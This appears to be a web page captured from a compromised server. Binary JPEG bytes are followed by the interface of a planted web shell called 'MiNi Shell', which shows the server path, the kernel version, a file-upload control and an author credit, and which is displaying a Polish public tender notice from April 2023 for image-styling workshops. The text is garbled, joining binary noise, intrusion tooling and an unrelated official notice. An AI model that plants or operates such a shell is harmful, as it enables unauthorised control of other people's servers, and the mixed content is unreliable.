JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230428/0019919001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie warsztatów z zakresu kreowania wizerunku profesjonalnego pracownika – usługa stylisty, metamorfoza i zakup ubioru dla uczestników OHP w ECKiW w Roskoszy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Główna Ochotniczych Hufców Pracy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 007001280</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tamka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-349</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kgohp@ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ohp.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Europejskie Centrum Kształcenia i Wychowania Ochotniczych Hufców</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">5372140912</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Roskosz</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Roskosz</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">21-500</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">eckiwroskosz@ohp.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">eckiw-roskosz.ohp.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie warsztatów z zakresu kreowania wizerunku profesjonalnego pracownika – usługa stylisty, metamorfoza i zakup ubioru dla uczestników OHP w ECKiW w Roskoszy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f6c59d1d-e5c4-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00199190</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Aktywni górą!” współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f6c59d1d-e5c4-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy eZamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy eZamówienia jest nieodpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowy opis zawarty jest w części<br/>IX SWZ przedmiotowego postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady<br/>Ogłoszenie nr 2023/BZP 00197964 z dnia 2023-04-28<br/>2023-04-28 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywny<br/>95/460WE (RODO) informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest:<br/>Komendant Główny Ochotniczych Hufców Pracy,<br/>ul. Tamka 1, 00-349 Warszawa<br/>e-mail: kgohp@ohp.pl<br/>tel. (+ 48) 22 578 47 01<br/>2. Dane kontaktowe Inspektora Ochrony Danych w Komendzie Głównej Ochotniczych Hufców Pracy – adres poczty elektronicznej:<br/>iodkg@ohp.pl<br/>3. Pana/Pani dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego, którego przedmiotem jest usługa polegająca na<br/>przeprowadzeniu warsztatów z zakresu kreowania wizerunku połączonych z usługą stylisty wraz z metamorfozą każdego uczestnika<br/>projektu pn. „Aktywni górą!” współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.<br/>Podanie Pana/Pani danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego;<br/>4. Odbiorcami danych osobowych przetwarzanych przez Komendanta Głównego OHP będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówień publicznych.<br/>5. Dane osobowe będą przechowywane, przez okres 5 lat licząc od pierwszego stycznia roku następnego, po roku w którym<br/>zakończono sprawę.<br/>6. Stosowanie do art. 22 RODO Pana/Pani dane osobowe nie będą podlegać decyzji, która opierać się będzie wyłącznie na<br/>zautomatyzowanym przetwarzaniu, w tym profilowaniu.<br/>7. Posiada Pan/Pani :<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. Nie przysługuje Panu/Pani:<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9. Jeżeli Komenda Główna Ochotniczych Hufców Pracy uzna to za konieczne, ma prawo żądać udokumentowania przekazanych<br/>informacji, jak również weryfikować je w oparciu o informacje ze źródeł otwartych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ECKiW.ZA.271.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Zorganizowanie i przeprowadzenie warsztatów z zakresu kreowania wizerunku profesjonalnego pracownika – usługa stylisty, metamorfoza i zakup ubioru dla uczestników OHP zrekrutowanych do projektu „Aktywni górą!” w ECKiW OHP w Roskoszy, realizowanego w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020<br/>Zamówienie objęte niniejszym postępowaniem jest częścią większego zamówienia – zamówienie udzielane jest w częściach.<br/>Usługa polega na:<br/>Warsztaty kreowania wizerunku profesjonalnego pracownika – przeprowadzenie warsztatów z usługą stylisty, metamorfoza i zakup ubioru, realizowane dla 20 uczestników projektu. Warsztaty będą składały się z trzech etapów, realizowane będą w grupach, osobno dla mężczyzn i kobiet, z uwagi na specyfikę potrzeb przedstawicieli obu płci w tej kwestii.<br/>Etap I usługa stylisty 8 godz./os (zajęcia w podziale na płeć). Zajęcia powinny uświadomić młodzieży, że w dzisiejszych czasach to w co się ubieramy i jak kreujemy nasz wizerunek wpływa na ocenę naszych kompetencji. Znając najważniejsze zasady „dress codu” oraz sposoby stylistów każdy może stać się pewniejszy siebie w różnych sytuacjach życiowych, jak np. rozmowa o pracę, rozmowa z przełożonym, wystąpienia publiczne i wiele innych. Zajęcia mają na celu zwiększenie samooceny uczestników projektu, nauczenie ich sposobów autoprezentacji oraz dbania o siebie. Poprzez udział w zajęciach młodzież nabędzie kompetencje w zakresie prezentowania się podczas rozmów o pracę oraz w innych sytuacjach strategicznych dla własnego rozwoju zawodowego. Zajęcia powinny mieć formułę warsztatową ukierunkowaną na kreowanie wizerunku profesjonalnego pracownika. <br/>Usługa stylisty ma w swoim założeniu stanowić pomoc podczas zakupów stroju, w którym uczestnik będzie mógł zaprezentować się potencjalnemu pracodawcy. <br/>Minimalny zakres tematyczny warsztatów:<br/>- zasady dress codu<br/>- określenie budowy ciała, sposoby korygowania dysproporcji sylwetki, dobór fasonów garderoby, rozmiarów, dodatków<br/>- sposoby autoprezentacji i wizażu – zasady kreowania wizerunku, wizerunek w pracy i podczas rozmów kwalifikacyjnych, wizerunek osobisty a wizerunek zawodowy, analiza kolorystyczna, zasady i składowe dobrego wizerunku, sposoby korygowania dysproporcji sylwetki, garderoba dobór fasonów, rozmiarów, dodatków, nowe stylizacje ze starej garderoby<br/>- kreowanie wizerunku profesjonalnego pracownika<br/>- konsultacje dotyczące kosmetyków, makijaż (makijaż na różne okazje), kosmetyka pielęgnacyjna (manicure i pedicure), podstawy makijażu, zapoznanie z techniką doboru oraz nakładania kosmetyków, dobór kolorystyki do typu urody i okazji.<br/>Etap II zakup stroju <br/>Ze względu na indywidualny charakter doboru właściwego stroju (pod względem rozmiarowym, estetycznym, kolorystycznym i rodzajowym) zakup strojów będzie realizowany indywidualne lub w małych grupach w zależności od możliwości organizacyjnych (maksymalnie 3 osoby), uczestniczyć w nich musi stylista, który udzieli pomocy w doborze stroju w takim zakresie, żeby efekt końcowy spełniał zwyczajowe wymagania stawiane ubiorom przeznaczonym do spotkań u potencjalnego pracodawcy oraz pozostawał w zgodzie z indywidualnym poczuciem komfortu uczestnika związanym z danym typem i rodzajem ubioru. W zakupach uczestniczyć będzie również przedstawiciel ECKiW OHP w Roskoszy (datę zakupów należy uzgodnić z Zamawiającym we wcześniejszym terminie). Zakupione powinny zostać zestawy ubraniowe odpowiednie na rozmowę kwalifikacyjną o pracę. <br/>Przykładowy zestaw dla uczestniczki projektu: spódnica, bluzka koszulowa, buty, dodatki w postaci: torebki, paska itp.<br/>Przykładowy zestaw dla uczestnika projektu: spodnie, marynarka, koszula, krawat, buty.<br/>Mogą to być również inne stroje uznane przez stylistę za stosowne (garsonka, sukienka, garnitur etc.)<br/>Zakupione ubiory muszą być wyłącznie nowe. Niedopuszczalny jest zakup odzieży używanej z tzw. drugiej ręki (second hand). Koszty zakupu strojów Wykonawca musi uwzględnić w swojej ofercie i musi je zapewnić jako integralną część całej usługi kreowania wizerunku. Prowadzący postępowanie zrefunduje Wykonawcy poniesione wydatki na zakup strojów po dostarczeniu faktury wraz z protokołem odbioru stroju podpisanym przez uczestnika oraz koordynatora z ramienia prowadzącego postępowanie oraz przez Wykonawcę. Wykonawca na potwierdzenie faktycznego dokonania zakupu ubrań za cenę wskazaną w fakturze końcowej za wykonanie przedmiotu zamówienia musi dołączyć potwierdzone za zgodność z oryginałem kserokopie faktur zakupu odpowiednich zestawów ubraniowych wybranych przez uczestników projektu. Prowadzący postępowanie w celu zapewnienia odpowiedniej jakości zindywidualizowanych zakupionych ubrań wymaga, żeby cena zakupionego zestawu ubraniowego dla jednej osoby wyniosła średnio 880 zł. pod warunkiem, że łączna kwota wydatkowana na zakup strojów dla 20 uczestników nie przekroczy wartości 17600,00 zł brutto.<br/>Etap III przeprowadzenie metamorfozy (udokumentowanej fotograficznie)<br/>W tej części specjalista ds. kreowania wizerunku ma doprowadzić do metamorfozy każdego uczestnika, poprzedzonej indywidualną konsultacją w gabinecie kosmetycznym, fryzjerskim lub innym </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">98200000-5 - Usługi konsultacyjne dotyczące zapewniania równych szans</p> <p class="mb-0">98000000-3 - Inne usługi komunalne, socjalne i osobiste</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.	Zamawiający nie określa warunków udziału w postępowaniu w zakresie:<br/>a)	posiadania zdolności do występowania w obrocie gospodarczym,<br/>b)	sytuacji finansowej lub ekonomicznej<br/>1.2.	Zamawiający wymaga aby Wykonawca posiadał:<br/>1.2.1 Zdolność techniczna lub zawodowa<br/>Wiedza i doświadczenie<br/>Opis spełnienia warunku:<br/><br/>Posiadanie przez Wykonawcę wykonane w okresie ostatnich 3 lat liczonych od dnia, w którym upływa termin składania ofert (a jeśli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną usługę kreowania wizerunku o zbliżonym charakterze w której brało udział co najmniej 5 osób.<br/><br/>Warunek jest spełniony, jeżeli wykonawca oświadczy, że spełnia warunek a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiot, na potencjale którego polega wykonawca spełnia warunek samodzielnie (zakaz łączenia potencjałów).<br/><br/>1.2.2	Dysponowanie osobami<br/>Opis spełnienia warunku:<br/><br/>Wykonawca spełni warunek jeśli dysponuje kadrą, która posiada wykształcenie w zawodzie stylisty, wizażu lub pokrewnym (np.: studia kosmetologiczne, studium/technikum kosmetyczne, szkoła policealna w zakresie kreowania wizerunku) lub certyfikat/ zaświadczenie z kursów podstaw wizażu umożliwiającego profesjonalne przeprowadzenie usługi kreowania wizerunku oraz co najmniej dwuletnie doświadczenie zawodowe umożliwiające przeprowadzenie warsztatów, licząc od daty uzyskania wyżej wymienionego wykształcenia lub daty wystawienia certyfikatu do daty składania ofert. Warunek zostanie spełniony jeżeli Wykonawca oświadczy, że posiada kadrę z odpowiednim wykształceniem i doświadczeniem zawodowym.<br/><br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z udziału w postępowaniu na podstawie art. 108 ust. 1 ustawy Pzp.<br/>3.	Zamawiający przewiduje wykluczenie z postępowania na podstawie art. 109 ust. 1 pkt. 8 i 10 ustawy Prawo zamówień publicznych. <br/>4.	W przedmiotowym postępowaniu Zamawiający wykluczy Wykonawcę zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129, 185).<br/>5.	Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie informacji zawartych w oświadczeniach i dokumentach. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ust. 1 pkt 1) ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz.<br/>2019) dopuszczalna jest zmiana umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.<br/>Zamawiający w SWZ w rozdziale XIX opisał istotne postanowienia umowy. Warunki umowy, które uwzględnione będą w<br/>przyszłej umowie z Wykonawcą wybranym w wyniku prowadzonego postępowania, zamieszczone są we wzorze umowy -<br/>załącznik nr 5 do SZW <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https//ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com